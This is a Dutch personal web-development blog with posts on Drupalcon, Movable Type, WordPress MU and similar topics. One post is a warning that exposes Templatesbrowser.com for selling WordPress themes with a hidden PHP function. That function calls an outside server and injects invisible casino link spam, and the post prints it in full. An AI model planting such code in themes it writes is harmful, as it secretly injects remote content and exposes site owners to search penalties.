Drupalcon Paris 2009
In de eerste week van september vond in Parijs de halfjaarlijkse Drupal-conferentie plaats. Zonder meer een inspirerend evenement! In deze blogpost een overzicht van de sessies die ik heb bijgewoond, inclusief links naar beeldmateriaal.
Read more
Typo3-filmpjes op YouTube
Interessant: op zoek naar documentatie over het open-source cms Typo3 kwam ik YouTube verschillende instructiefilmpjes tegen. Erg simpel allemaal, ze vormen bij lange na geen vervanging voor de verschillende Typo3-handleidingen en -cursussen, maar ze laten wel zien dat YouTube veel meer biedt dan alleen amusement. En als er tegenwoordig ook al taalcursussen op cd-rom verschijnen, waarom dan geen ict-lessen op video? Read more
Nieuw tijdschrift over webdesign
Sinds ict-uitgever IDG in 2003 stopte met NetProfessional en Kluwer in 2004 de stekker trok uit Adfo Web, dacht ik: de markt voor Nederlandstalige tijdschriften voor internetprofessionals is simpelweg te klein. Maar nu is er een andere uitgever die het toch weer gaat proberen. Volgende maand verschijnt het eerste nummer van Web-designer, een nieuw tijdschrift van F&L Publications dat zich richt op de creatieve aspecten van het ontwerpen van websites. Read more
Templatesbrowser.com en de blogosfeer
Het blijft altijd weer curieus hoe nieuws zich verspreidt over de hele wereld. Zo’n drie maanden ontdekte Onno’s Follow That Page een rare link in mijn site en had ik na drie kwartier speuren en puzzelen genoeg bewijsmateriaal verzameld om de boosdoener aan te wijzen: de website Templatesbrowser.com verspreidt kwaadaardige WordPress-themes.
Een enorme beveiligingsinbreuk, maar het door Onno vertaalde bericht werd totaal niet opgepikt door de blogosfeer, ook niet na berichtjes op Digg en eKudos. Nu toch wel: in juni kwamen Joomla-gebruikers erachter dat Templatesbrowser.com niet te vertrouwen is en via deze omweg begint nu ook eindelijk de WordPress-wereld wakker te worden, lees bijvoorbeeld dit en dit. Ook een nieuw berichtje op Digg krijgt volle aandacht: WARNING! WordPress & Joomla; your theme might have malicious code. Is het het woordje WARNING waardoor internetters er nu wel aandacht aan besteden?
Betaaldiensten
Een eerste experiment met betaalde webcontent, in samenwerking met Routewerk: op wandelsite Tweevoeter kun je sinds kort betaalde wandelroutes downloaden. Dit experiment is voorafgegaan door grondig onderzoek naar de bestaande betaaldiensten op internet, zoals iDeal, Paypal en ClickandBuy.
Uiteindelijk hebben we gekozen voor betalen via de telefonische betaaldienst Mollie, die bijvoorbeeld ook gebruikt wordt door Nieuwsbank.nl. De betaling is in hooguit twee minuten geregeld: je belt een 0900-nummer, je toetst een zescijferige code in en je krijgt meteen toegang tot de route, die je vervolgens kunt uitprinten. De kosten worden automatisch verrekend via je telefoonrekening. Je hebt geen creditcard of abonnement nodig en de transactie verloopt geheel anoniem.
Een ideale betaalmethode? De praktijk zal het leren.
Movable Type wordt open-source
Via Peter Olsthoorn een interessant nieuwtje van Maarten Schenk, werkzaam bij Six Apart: er is een bèta-versie verschenen van Movable Type 4.0. Een greep uit de nieuwe features:
- een totaal vernieuwde gebruikersinterface,
- een nieuwe WYSIWIG-editor,
- nieuwe import/export- en backup/restore-functies,
- een blogdashboard met statistieken,
- OpenID-ondersteuning,
- installatiewizard,
- ondersteuning voor losse pagina’s,
- ingebouwd asset-management voor het beheer van opgeladen bestanden en foto’s
En nog belangrijker nieuws: Movable Type wordt open-source. Dat kan ik alleen maar toejuichen, want eerder schreef ik nog over het vage Mambo-achtige tweesporenbeleid van Six Apart: een beetje commercieel, een beetje open-source. Het lijkt erop dat Six Apart voor het overweldigende succes van WordPress door de knieën gaat en niet alleen WordPress-achtige features introduceert, maar ook definitief kiest voor een open-source aanpak.
Enkele weken geleden schreef ik nog over een weeffout in WordPress, namelijk gratis themes waarin stukjes (mogelijk onveilige) PHP-scripting voorkomen. Als de nieuwe MT-versie inderdaad zo’n grote stap voorwaarts is, dan is de keuze voor mij duidelijk: dan blijf ik voor mijn belangrijkste sites voorlopig Movable Type gebruiken.
Verborgen linkspam van Templatesbrowser.com in WordPress-weblogs
Vorige maand roemde ik op deze plek de duizenden gratis WordPress-themes die je kunt downloaden om je weblog op te tuigen. Maar pas op: dankzij broer Onno en zijn onvolprezen dienst Follow That Page ontdekte ik vanmiddag dat sommige themes ook iets anders doen: verborgen links toevoegen naar casino-, hotel- en andere sites – kortom linkspam. En dit is de site die daarvoor verantwoordelijk is: www.templatesbrowser.com/wordpress-themes/.
Hoe werkt Templatesbrowser.com?
Op deze site kun je meer dan honderd gratis WordPress-themes downloaden. Deze themes zijn weer afkomstig van andere sites, maar uit de tien willekeurige themes die ik heb gedownload blijkt dat er is een sneaky stukje PHP-code toegevoegd aan het bestand functions.php:
function credits()
{
$url = “http://get.templatesbrowser.com/wp.php?” .
“url=” . urlencode($_SERVER['REQUEST_URI']) . “&” . “host=” . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen(”get.templatesbrowser.com”, 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}
Voor wie geen PHP kent: deze functie legt contact met get.templatesbrowser.com en geeft daarbij het adres van je eigen site mee. Bijvoorbeeld:
http://get.templatesbrowser.com/wp.php?url=%2F&host=www.laterna.nl
In mijn geval geeft de server de volgende code terug:
<div id=”copyl” style=”display: none;”><a href=”http://www.casinotropez.com/trcpromo-nincs-online-pmail18-fr”>casino en ligne</a></div>
Dit is de HTML-code van een link naar een site die ik niet ken en waar ik ook niets mee te maken wil hebben. Dankzij de CSS-toevoeging ‘display: none’ is die onzichtbaar opgemaakt. Deze code wordt onderaan elke WordPress-pagina toegevoegd. Dat gebeurt in het bestand footer.php:
<?php credits(); wp_footer(); ?>
Het geniepige is dat het contact met templatesbrowser.com alleen lijkt te werken vanuit een WordPress-weblog. Als ik bovenstaand webadres zelf invul in mijn browser, dan wordt er geen HTML-code teruggegeven.
Ook merk ik dat het uitmaakt op welk adres je weblog staat. Als ik urlencode($_SERVER['HTTP_HOST']) simpelweg vervang door www.google.com of www.startpagina.nl, dan wordt er geen verborgen link teruggegeven, maar helemaal niets, of iets onschuldigs als
<!– T-B –>
Ook zit er een random element in: als je op F5 drukt, verandert soms de code.
Een hogere PageRank?
Templatesbrowser.com doet dit klaarblijkelijk om sommige sites een hogere PageRank te bezorgen. Toch lijkt het me niet waarschijnlijk dat Google erin trapt. De manier waarop de link onzichtbaar is gemaakt (style=”display: none;”) is simpelweg té doorzichtig. Maar als Google inderdaad doorheeft dat het hier linkspam betreft, dan loopt de eigenaar van de weblog het risico om hiervoor gestraft te worden. Door de aard van PHP (een server-side scriptingtaal waarvan Google alleen de uitvoer ziet, niet de bron) is niet zichtbaar dat de betreffende HTML door een heel andere site wordt gegenereerd.
Het risico?
Uit het bovenstaande blijkt dat het downloaden van een WordPress-theme een zeker beveiligingsrisico inhoudt. Zoals gezegd bestaat zo’n theme niet alleen uit CSS-opmaak, maar ook uit extra PHP-code. Welke WordPress-gebruiker neemt de moeite om die meegeleverde PHP-code regel voor regel uit te vlooien alvorens een theme te installeren? PHP kan bovendien veel ernstiger dingen doen dan alleen maar een verborgen link in je site stoppen.
Al met al vind ik dit toch wel een belangrijk minpunt van WordPress. Voor zover ik kan nagaan, is het in Movable Type niet mogelijk om malicieuze code te stoppen in een template. Al met al lijkt de architectuur van WordPress meer op flexibiliteit gericht, minder op beveiliging.
Firefox: nog steeds veiliger dan Internet Explorer
Regelmatig krijg ik van opdrachtgevers de vraag welke browser ze het beste kunnen gebruiken. Een kort maar krachtig antwoord: gebruik Firefox.
Hoewel de Firefox-hype afgelopen jaar wat minder is geworden en ook deze browser is in het nieuws gekomen door veiligheidsproblemen, blijkt Firefox nog steeds veiliger dan Internet Explorer. In beide browsers komen weliswaar ongeveer evenveel lekken voor, maar bij Firefox worden ze veel sneller gerepareerd:
De ontwikkelaars van Mozilla hadden – gemeten over 26 lekken – gemiddeld twee dagen nodig om een fout op te lossen. Bij Microsoft duurde het gemiddeld tien dagen, gemeten over vijftien lekken.
Ziek door de informatiesamenleving
E-mails, telefoontjes en voicemails – ze maken ons alleen maar dommer. De psychiater Dr. Edward Hallowell heeft zelfs een nieuwe ziekte benoemd, die vooral in het bedrijfsleven welig tiert: ADT, ofwel Attention Deficit Trait. De symptomen:
When people find that they’re not working to their full potential; when they know that they could be producing more but in fact they’re producing less; when they know they’re smarter than their output shows; when they start answering questions in ways that are more superficial, more hurried than they usually would; when their reservoir of new ideas starts to run dry; when they find themselves working ever-longer hours and sleeping less, exercising less, spending free time with friends less and in general putting in more hours but getting less production overall.
En verderop:
It’s the great seduction of the information age. You can create the illusion of doing work and of being productive and creative when you’re not. You’re just treading water.
Meer bij News.com. En lees ook dit interview op Computerworld, waar hij enkele simpele remedies voorstelt. Zoals 25 jumping jacks, oftewel in de lucht springen met gespreide benen. Ha, dat wordt nog gezellig in de personeelskantine.
Een jaar ervaring met WordPress MU
Posted by laterna on December 14, 2009 · 3 Comments
Najaar 2008 maakte ik voor het eerst kennis met WordPress MU, na ruim een jaar wordt het tijd om mijn ervaringen op een rijtje te zetten.
WordPress MU… wat is dat?
Even uitleggen: WordPress (wordpress.org) is een open-source pakket waarmee je weblogs en niet al te ingewikkelde websites kunt maken. WordPress MU (mu.wordpress.org) is in feite hetzelfde, maar met het verschil dat je het maar één keer hoeft te installeren om meerdere websites op te zetten. MU (spreek uit mjoe) staat dan ook voor multi-use.
Themes (om je WordPress-site een eigen smoel te geven) en plugins (extra snufjes) hoef je maar één keer te installeren. Per website kun je beslissen deze wel of niet te activeren. Elke WordPress MU-website draait naar keuze op een eigen subdomein (sitenaam.laterna.nl), of in een submap (laterna.nl/sitenaam).
Het ei van Columbus voor wie meerdere WordPress-websites beheert? Soms wel, soms niet. Hieronder mijn bevindingen.
Voordelen van WordPress MU?
Uniformiteit in beheer
Zoals gezegd hoef je bij WordPress MU alle themes en plugins maar één keer te installeren. Dus zodra een nieuwe versie van een plugin verschijnt, hoef je die maar eenmalig bij te werken. Dat scheelt veel werk als je heel veel websites beheert. Zeker als het gaat om een security-upgrade is het belangrijk om snel om te kunnen schakelen naar een veilige nieuwe versie.
Meertalige websites
WordPress MU is handig bij het opzetten van een meertalige website. Voor elke taal maak je een nieuwe website aan. Bouw in de layout een taalswitch in en je bent al een heel eind op streek.
Backups
WordPress MU stopt de data van alle websites in één en dezelfde MySQL-database. Je hoeft dus maar één database te backuppen. Maak je een nieuwe website aan op dezelfde WPMU-installatie? Als je eenmaal hebt gezorgd voor een goede backupprocedure, dan wordt de nieuwe website automatisch meegenomen.
OTAP
Complexe websites worden vaak volgens het OTAP-stappenplan opgezet (Ontwikkeling, Test, Acceptatie, Productie), of een vereenvoudigde versie daarvan, bijvoorbeeld alleen Test en Productie. In WordPress MU kun je voor elk van deze stappen een aparte website aanmaken. Zodra een stap is afgerond, kun je de website overkopiëren naar de volgende website. Alle websites draaien echter op dezelfde server, waardoor je minder snel voor verrassingen komt te staan als een website live gaat.
Aggregatie
Heb je een hele serie weblogs onder WordPress MU en wil je een voorpagina maken met een overzicht van de laatste blogberichten, of een tagcloud van alle blogs? Er bestaan diverse plugins die dit voor je kunnen doen, zoals AHP Sitewide Recent Posts for WPMU en WordPress MU Sitewide Tags Pages. Een voorbeeld van zo’n totaaloverzicht zie je op weblogs.nos.nl en www.blogo.nl.
Geavanceerde rechtenstructuur
Bij WordPress werd al onderscheid gemaakt tussen auteurs en beheerders, maar bij WordPress MU gaat de rechtenstructuur nog een stap verder. Je hebt daar beheerders voor de hele WordPress MU-installatie en ook beheerders per afzonderlijke site, of combinatie daarvan. Gebruikers kunnen zowel redacteur als beheerder zijn, of zelfs redacteur van de ene site en beheerder van de andere site. Je hoeft maar één keer je wachtwoord te wijzigen en de wijziging geldt voor alle websites.
En de nadelen van WordPress MU?
Tot zover allemaal goed nieuws. Afgelopen jaar heb ik ook een aantal minpunten van WordPress MU ondervonden.
Beperkte compatibiliteit
Het overgrote deel van alle WordPress-plugins en themes is gemaakt voor de klassieke WordPress-versie. De meeste draaien ook wel op WordPress MU, maar soms vraagt het wat extra programmeerinspanning om een plugin of theme ook daar goed te laten werken. Het is me ook zelf overkomen: je koopt voor 75 dollar een mooi WordPress-theme, bij installatie blijkt die niet geschikt voor WPMU, maar dat stond niet op de site toen ik dat theme kocht.
Downtime bij upgraden
Is er een belangrijke nieuwe WordPress-versie verschenen? Bij WPMU hoef je maar één installatie te upgraden. Maar dat is tegelijkertijd ook een nadeel: mocht de upgrade niet vlekkeloos verlopen (bijvoorbeeld omdat een van de plugins niet compatibel is met de nieuwe versie), dan zijn álle websites op die installatie uit de lucht totdat jij het probleem hopelijk hebt opgelost.
Grotere kwetsbaarheid
Ook hacks brengen grotere risico’s met zich mee bij WordPress MU. Zoals gezegd maken alle websites gebruik van dezelfde MySQL-database. Als een WPMU-installatie is gekraakt, dan kunnen álle websites verloren gaan.
Niet up-to-date
WordPress MU is gebaseerd op de programmeercode van WordPress. Zodra een beveiligingslek wordt gevonden, verschijnt een nieuwe versie van WordPress. Daarna duurt het meestal een paar dagen, of zelfs nog langer, voordat ook WordPress MU eindelijk is bijgewerkt.
Uiteraard heb ik er begrip voor dat open-source software grotendeels vrijwilligerswerk is en dat veel ontwikkelaars dit naast hun reguliere baan doen. Toch zit deze vertraging in het updaten van WPMU mij niet lekker. Voor hackers is het immers een kleine moeite om een script te schrijven dat internet afzoekt naar WordPress MU-websites die nog niet up-to-date zijn. Als het dagen duurt voordat een WPMU-site weer veilig is, dan hebben ze zeeën van tijd om toe te slaan.
Subdomeinen en submappen
Zoals gezegd kun je bij de installatie van WordPress MU kiezen of een website een subdomein (sitenaam.laterna.nl) of een submap (laterna.nl/sitenaam) moet worden van het hoofddomein. Die keuze kun je maar één keer maken. Het is wel mogelijk om later alsnog te switchen van het een naar het ander, maar dat is bepaald niet eenvoudig en de benodigde stappen worden bij mijn weten nergens op de officiële website uitgelegd (wel op particuliere blogs). Doorgaans wordt aangeraden om in deze situatie alles opnieuw te installeren.
Verder heeft WordPress MU nog een onhebbelijkheid: hij laat standaard www. in het adres van het hoofddomein weg. Mijn website heeft daardoor een jaar lang laterna.nl als adres gehad, in plaats van www.laterna.nl.
Nu maakte dat in de praktijk niet zo gek veel uit: je werd van www.laterna.nl automatisch doorgelinkt naar laterna.nl. En ook hier kun je met enig kunst- en vliegwerk het www. wel weer terugkrijgen in het adres. Toch raakt dit bij mij een principieel punt: ik wil dit soort dingen zélf beslissen. Waarom moet WPMU per se afwijken van de conventie dat alle webadressen met www beginnen?
Conflicten met andere toepassingen
Zodra je op een Linux-server kiest voor installatie van WordPress MU op subdomeinen, dan kunnen er complicaties optreden. Afhankelijk van hoe je de DNS hebt gewijzigd, kunnen bestaande subdomeinen opeens niet meer werken, bijvoorbeeld webmail.laterna.nl. Dit is allemaal wel op te lossen, maar het rechtzetten van DNS-settings is tijdrovend omdat sommige wijzigingen pas na enkele uren effect hebben.
Als je geen toegang hebt tot je eigen DNS, dan is mijn advies: installeer WPMU-websites als submappen, niet als subdomeinen – het kan je een heleboel rompslomp schelen.
Kortom?
Het is niet mijn bedoeling om WordPress MU hier af te kraken – alleen maar om de plussen en minnen in kaart te brengen.
Voor mij persoonlijk is WPMU niet de juiste oplossing gebleken. Ik beheer maar een handjevol weblogs en ben tot de conclusie gekomen dat WordPress MU in mijn situatie meer overhead oplevert dan bespaart. Inmiddels ben ik weer teruggegaan naar afzonderlijke WP-installaties.
Toch zijn er situaties waar WPMU wel degelijk een goede oplossing is. Ik denk dan aan een combinatie van de volgende omstandigheden:
Ook denk ik dat WordPress MU hogere eisen stelt aan de rol van beheerder:
Kan jouw organisatie of team voldoen aan deze voorwaarden? Ga dan gerust aan de slag met WordPress MU, bij verantwoord gebruik zul je er veel plezier van hebben.
En anders: denk er nog eens goed over na. Misschien is dan de klassieke versie van WordPress nog zo gek niet – ook al moet je die voor elke website apart installeren.
Filed under Commentaar, Ontwikkelingen · Tagged with CMS, mysql, open-source, PHP, security, WordPress